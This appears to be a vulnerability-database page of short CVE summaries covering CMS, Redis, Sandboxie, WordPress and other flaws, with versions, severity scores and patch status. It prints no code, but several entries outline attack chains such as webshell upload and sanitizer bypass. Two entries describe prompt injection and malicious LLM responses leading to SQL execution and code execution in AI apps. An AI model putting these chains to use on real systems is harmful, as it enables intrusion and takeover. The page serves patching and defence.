Remote code execution in Grav CMS versions prior to 2.0.0-beta.2 allows authenticated administrators to deploy malicious PHP web shells by uploading crafted ZIP files through the Direct Install tool at /admin/tools/direct-install. The vulnerability combines insufficient ZIP archive content validation (Zip Slip primitive via path traversal) with the design-level acceptance of arbitrary plugin PHP code. Publicly available exploit code exists, demonstrating automated login, nonce extraction, malicious plugin upload, and persistent shell deployment. CVSS 9.1 (Critical) reflects network-accessible RCE with scope change, though exploitation requires high privileges (admin role). No EPSS or KEV data available at time of analysis.
Remote command execution in Pi-hole FTL versions before 6.6.1 allows network-adjacent attackers with API access to inject malicious dnsmasq directives via unvalidated newline characters in the dns.interface configuration field, achieving arbitrary code execution when DHCP leases are requested. Deployments with no admin password (a documented default configuration) expose the configuration API without authentication, enabling unauthenticated remote exploitation. The Pi-hole project released version 6.6.1 with input validation that strips newline characters, and the fix commit (0c46e4ec7f) replaced validate_stub with validate_str_no_newline.
Arbitrary local file disclosure in changedetection.io allows remote unauthenticated attackers to read sensitive system files via crafted backup archives. When a malicious backup ZIP is uploaded and restored, the application trusts attacker-controlled paths in the history.txt file, enabling reads of files like /etc/passwd, environment variables, application secrets, and mounted Docker volumes through the Preview UI or history API. This vulnerability (CVSS 7.5) affects all versions through 0.54.10, with fix available in 0.55.1. No active exploitation (KEV) confirmed, but a detailed proof-of-concept exists demonstrating the complete attack chain from backup modification to file exfiltration. EPSS data not available, but the combination of network attack vector, no authentication requirement, and public exploit code makes this a priority for immediate patching.
Argument injection in exiftool-vendored npm package allows remote attackers to perform unauthorized file reads or writes via newline characters in tag names, filenames, or options. The vulnerability affects applications using exiftool-vendored ≤ 35.18.0 that pass attacker-controlled strings to ExifTool APIs without sanitization. Exploitation enables attackers to manipulate ExifTool's command-line arguments by injecting newlines into supposedly single-argument strings, breaking out of intended argument boundaries. While no remote code execution has been demonstrated, the CVSS 8.2 HIGH score reflects the network attack vector, low complexity, and lack of authentication or user interaction requirements. Fixed in version 35.19.0 with dual-layer validation rejecting control characters in both tag names and the command renderer. No public exploit code or active exploitation confirmed at time of analysis.
SQL injection in Masa CMS beanFeed.cfc allows unauthenticated remote attackers to extract sensitive database contents, modify records, delete data, or potentially execute code on the database server. The vulnerability affects multiple release branches (7.2.x through 7.5.x) and stems from unsanitized concatenation of the sortDirection parameter directly into SQL queries. With CVSS 9.3 (critical severity, network-accessible, no authentication required) and no public exploit currently identified, this represents a high-priority patching scenario for internet-facing Masa CMS deployments. Vendor-released patches are available across all affected branches.
Stack-based buffer overflow in Sandboxie-Plus SbieSvc service enables sandboxed processes to escape isolation and execute code as SYSTEM. Affected versions 1.17.2 and earlier allow malicious sandboxed code to overflow a fixed 160-wide-character stack buffer in NamedPipeServer::OpenHandler via crafted named pipe open requests, bypassing the fundamental security boundary Sandboxie provides. Fixed in version 1.17.3. EPSS data unavailable, no CISA KEV listing or public exploit identified at time of analysis, but the security boundary violation represents a complete defeat of Sandboxie's core function.
Stack-based buffer overflow in Sandboxie-Plus ProcessServer handlers allows local authenticated attackers to execute arbitrary code as SYSTEM or crash the SbieSvc service. The vulnerability affects versions 1.17.2 and earlier, stems from unsafe wcscpy operations on unchecked WCHAR fields from service pipe requests, and has been patched in version 1.17.3. The service pipe's NULL DACL permits any local process to connect and trigger the flaw before authorization checks execute, enabling privilege escalation from low-privileged local accounts. No public exploit code identified at time of analysis, though the technical details in the GitHub advisory provide sufficient information for skilled attackers to develop exploits.
Local privilege escalation to SYSTEM in Sandboxie-Plus 1.17.2 and earlier allows low-privileged interactive users to trigger stack buffer overflow in SbieSvc service via unauthenticated IPC, bypassing sandbox isolation controls. The vulnerability exists in the RunSbieCtrl handler which processes crafted messages before security checks and copies unbounded input into a 128-character stack buffer. Fixed in version 1.17.3. EPSS data unavailable; not listed in CISA KEV at time of analysis, but publicly disclosed via GitHub Security Advisory with technical details sufficient for exploit development.
Cross-site request forgery in AVideo's userSavePhoto.php endpoint allows unauthenticated remote attackers to overwrite any logged-in user's profile photo with arbitrary bytes by luring them to a malicious webpage. The vulnerability exploits a missing CSRF token and a default cookie policy of SameSite=None on HTTPS deployments, combined with unvalidated base64 decoding that accepts any file content. Each successful attack also triggers a global cache invalidation, enabling denial-of-service via cache thrashing.
Prompt injection in SQLBot 1.7.0 and earlier allows authenticated attackers to execute arbitrary SQL statements through the Text2SQL chat interface, escalating to remote code execution when connected to PostgreSQL databases via COPY FROM PROGRAM. The vulnerability stems from unsanitized user input being directly concatenated into LLM prompts, with resulting SQL executed without validation. CVSS 9.4 (Critical) reflects network-based attack with low complexity requiring only low-privilege authentication. SSVC framework confirms proof-of-concept availability and total technical impact, though exploitation is not fully automatable. Vendor-released patch 1.7.1 addresses the issue.
Unauthenticated remote code execution in AVideo ≤29.0 allows attackers to inject and execute arbitrary JavaScript in the browsers of any logged-in users through a WebSocket message relay bypass. An attacker obtains a WebSocket token without authentication from plugin/YPTSocket/getWebSocket.json.php, connects to the WebSocket server, and sends a crafted message with autoEvalCodeOnHTML nested under the json field instead of msg. The incomplete server-side sanitization from prior fix c08694bf6 (GHSA-gph2-j4c9-vhhr) only strips autoEvalCodeOnHTML from $json['msg'], but the relay function msgToResourceId() preferentially selects $msg['json'] as the outbound message carrier. The payload bypasses sanitization, reaches the victim's browser via WebSocket relay, and executes through eval() at plugin/YPTSocket/script.js:573-575. Vendor-released patch: commit 9f3006f9a (recursive stripping across all message carriers). No public exploit identified at time of analysis, but the advisory includes functional proof-of-concept Python code.
Stored XSS in LobeChat's message rendering escalates to remote code execution via exposed Electron IPC when victims configure an attacker-controlled LLM provider endpoint. The vulnerability chains unfiltered HTML rendering with an unauthenticated shellCommand IPC handler that executes arbitrary system commands at user privilege level. Confirmed in versions up to 2.1.26; patch released in v2.1.48. Public proof-of-concept demonstrates opening arbitrary applications via malicious LLM API responses.
Heap-based buffer overflow in RedisBloom versions before 2.8.20 enables remote code execution via Redis RESTORE command when authenticated attackers supply malicious serialized payloads. The vulnerability stems from improper validation of deserialized data in the probabilistic data structures module. Exploitation requires Redis authentication and RESTORE command privileges (PR:L), with CVSS 7.7 rating reflecting the authentication requirement despite critical impact potential. No public exploit code or CISA KEV listing identified at time of analysis, though vendor has released security-focused patch 2.8.20.
Remote code execution in RedisTimeSeries versions before 1.12.14 allows authenticated attackers with RESTORE command permissions to execute arbitrary code via crafted serialized payloads. The vulnerability stems from improper validation of data processed through Redis RESTORE command, enabling heap buffer overflow exploitation. Attackers with low-level privileges can achieve complete system compromise (CVSS 7.7, CVSS:4.0 High confidentiality/integrity/availability impact) through network-based attacks with high complexity. No public exploit code or active exploitation confirmed at time of analysis.
Remote code execution in Redis server versions up to 8.6.3 allows authenticated attackers with RESTORE command privileges to execute arbitrary code by submitting maliciously crafted serialized payloads. The vulnerability stems from insufficient validation of serialized values in the RESTORE command, enabling heap-based buffer overflow conditions. Redis released version 8.6.3 to patch this flaw alongside four other critical RCE vulnerabilities. EPSS data not available; no CISA KEV listing identified at time of analysis, suggesting targeted rather than widespread exploitation.
Redis-server with Lua scripting allows authenticated attackers to trigger a use-after-free vulnerability on replicas where replica-read-only is disabled, potentially leading to remote code execution. The vulnerability exploits the master-replica synchronization mechanism and is present in all versions prior to 8.6.3. Patch vendor-released patch: 8.6.3.
Use-after-free in Redis 7.2.0 through 8.6.2 allows authenticated attackers to achieve remote code execution by exploiting error handling in the unblock client flow. When a blocked client is evicted during command re-execution, the server fails to handle the error return from processCommandAndResetClient, triggering memory corruption. Redis has released version 8.6.3 with a security fix. No public exploit code or CISA KEV listing identified at time of analysis, suggesting limited observed exploitation despite the critical RCE impact.
Remote code execution in Eclipse BaSyx Java Server SDK versions prior to 2.0.0-milestone-10 allows unauthenticated remote attackers to write arbitrary files anywhere on the host filesystem via path traversal in the Submodel HTTP API's file upload fileName parameter, leading to complete system compromise. The vulnerability receives the maximum CVSS score of 10.0 due to network-accessible exploitation requiring no authentication, privileges, or user interaction, with scope change enabling impact beyond the vulnerable component. EPSS data not available; KEV status not confirmed; exploitation status depends on release recency and deployment exposure of this industrial automation SDK.
Remote code execution in Betheme WordPress theme versions up to 28.4 allows authenticated attackers with author-level privileges to upload malicious PHP files disguised as icon packs. The upload_icons() function extracts user-controlled ZIP files into public directories without validating extracted content, enabling arbitrary code execution. This vulnerability requires only author-level WordPress credentials (PR:L) and has network attack vector (AV:N) with low complexity (AC:L), making it readily exploitable by compromised or malicious site contributors. No public exploit code or CISA KEV listing identified at time of analysis.
ERPGo SaaS 3.9 contains a CSV injection vulnerability that allows authenticated attackers to execute arbitrary code by injecting formula payloads into vendor name fields. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
Frappe Framework ERPNext 13.4.0 contains a sandbox escape vulnerability in RestrictedPython that allows authenticated users with System Manager role to execute arbitrary code by exploiting frame. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
Eclipse Equinox OSGi 3.7.2 and earlier contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary commands by sending payloads to the console interface. Rated critical severity (CVSS 9.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
Eclipse Equinox OSGi versions 3.8 through 3.18 contain a remote code execution vulnerability in the console interface that allows unauthenticated attackers to execute arbitrary code by exploiting the. Rated critical severity (CVSS 9.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
Remote code execution in Geeky Bot WordPress plugin versions ≤1.2.2 allows unauthenticated attackers to install arbitrary plugins and execute code on affected sites. The vulnerability exploits a missing authorization check in a nopriv AJAX handler that permits attacker-controlled function dispatch to a plugin installer, enabling download and extraction of malicious ZIP files directly into wp-content/plugins/. With CVSS 9.8 (critical), network-exploitable without authentication, and EPSS data unavailable, this represents a severe risk to all WordPress sites running vulnerable versions until patched.
Stack-to-heap overflow in Nix and Lix daemon's NAR parser enables local privilege escalation to root in multi-user installations. Low-privileged users with daemon access can trigger unbounded recursion in the coroutine-based parser to overwrite heap memory and achieve arbitrary code execution as the Nix daemon (root), provided ASLR can be bypassed. Vulnerability affects Nix 2.24.4-2.34.6 and Lix 2.93.0-2.95.1, with vendor-confirmed patches released across multiple version branches. CVSS vector indicates local attack with high complexity but cross-scope privilege escalation, consistent with the EPSS score suggesting targeted exploitation scenarios rather than mass scanning.
Prototype pollution read-side gadgets in the axios HTTP adapter (npm, versions >=1.0.0 to <1.15.2) allow an attacker who has already polluted Object.prototype in the same Node.js process to hijack every outbound request - injecting attacker-controlled Authorization headers, redirecting relative-URL requests to an external server, pointing requests at internal Unix sockets (SSRF/container escape), forcing Node's insecure HTTP parser, and even executing an attacker-supplied beforeRedirect callback. The flaw stems from five config properties (auth, baseURL, socketPath, beforeRedirect, insecureHTTPParser) being read via direct property access that traverses the prototype chain, unlike eight sibling properties already guarded by an own() helper. A working proof-of-concept is published in the GHSA advisory, but EPSS is only 0.03% and the issue is not in CISA KEV - no public exploit identified at time of analysis as a standalone attack, and it requires a separate prototype pollution primitive to fire.
Server-Side Template Injection in ERPNext v15.103.1 and earlier allows remote code execution through malicious email templates. Attackers with email template editing permissions can inject Jinja2 expressions that execute arbitrary Python code on the server when templates are rendered. SSVC framework confirms POC availability and automatable exploitation with total technical impact. CVSS 9.8 reflects network-reachable critical severity, though the 0.02% EPSS score (5th percentile) suggests limited real-world exploitation attempts to date, likely due to the permission prerequisite.
Remote code execution in ArchiveBox <= 0.8.6rc0 allows unauthenticated attackers to execute arbitrary commands on the server via unvalidated config injection in the /add/ endpoint. When PUBLIC_ADD_VIEW=True (common for bookmarklet usage), attackers inject malicious environment variables through the config JSON parameter that propagate to archive plugins like yt-dlp and gallery-dl, enabling command execution via --exec flags. The endpoint lacks both input validation and CSRF protection. CVSS 9.3 (Critical) with network vector, low complexity, and no authentication required. Public proof-of-concept exploit exists demonstrating pre-authentication RCE. No vendor-released patch identified at time of analysis.
Path traversal in AzuraCast's Flow.js media upload endpoint allows authenticated users with media management permissions to write arbitrary PHP files outside designated storage directories, achieving remote code execution. The vulnerability exists in versions ≤0.23.5 where the unsanitized `currentDirectory` parameter bypasses filename sanitization, and a `finally` block writes uploaded files before MIME validation completes. Only local filesystem storage (default configuration) is affected-remote S3/cloud backends are not vulnerable. Vendor-confirmed patch available in version 0.23.6. No public exploit or CISA KEV listing identified at time of analysis, but detailed proof-of-concept exists in GitHub advisory GHSA-vp2f-cqqp-478j demonstrating webshell upload to web root.
Arbitrary database table drop in CI4MS theme deletion allows authenticated administrators with theme.delete permission to craft malicious POST requests to the `/backend/themes/delete-process/` endpoint and drop any table in the database, including critical tables such as ci4ms_users and ci4ms_auth_identities. The vulnerability exists because the deleteProcess() action accepts user-supplied table names without validating them against the theme's own migration files, violating the principle of least privilege even within the admin trust model. Vendor-released patch 0.31.8.0 implements migration-based whitelist validation to restrict deletions to declared theme tables.
Integer overflow in Pillow 10.3.0 through 12.1.1 bypasses bounds checks during PSD tile extent validation, enabling memory corruption and arbitrary code execution when processing malicious PSD files. This vulnerability (CVE-2026-42311) exploits an incomplete fix for CVE-2026-25990, where the original patch added tile extent validation but used overflow-prone integer types. Attackers craft PSD images with tile dimensions that wrap around during extent sum calculations, defeating the bounds checks and triggering out-of-bounds writes in decode.c and encode.c. Pillow 12.2.0 patches this by avoiding extent addition before comparison. No active exploitation confirmed (not in CISA KEV); publicly available exploit code exists via proof-of-concept test images in the patch commit.
Remote code execution as root in nginx-ui versions before 2.3.8 via unauthenticated backup restore within 10-minute startup window. Attackers exploit the completely unauthenticated /api/restore endpoint during initial installation to upload malicious backup archives that overwrite app.ini configuration with injected OS commands in TestConfigCmd setting. After automatic application restart, command injection triggers with privileges of the nginx-ui process - typically root in Docker deployments. EPSS data not available; no active exploitation reported but publicly disclosed via GitHub Security Advisory GHSA-4pvg-prr3-9cxr. Patch released in version 2.3.8.
Server-side template injection in OpenMRS Core allows authenticated users with 'Manage Concepts' privilege to execute arbitrary Java code by injecting malicious Apache Velocity templates into concept reference range criteria fields. The vulnerability stems from unsafe VelocityEngine initialization without sandbox restrictions (no SecureUberspector), enabling unrestricted Java reflection. Exploitation persists across all facility users whenever observations are validated against the compromised concept, creating a persistent remote code execution vector. Fixed in versions 2.7.9 and 2.8.6 via migration from Velocity to sandboxed Spring Expression Language (SpEL) with SimpleEvaluationContext. No active exploitation confirmed (not in CISA KEV), but proof-of-concept details available from researcher advisory at machinespirits.com.
Quick Facts
- Typical Severity
- CRITICAL
- Category
- other
- Total CVEs
- 31887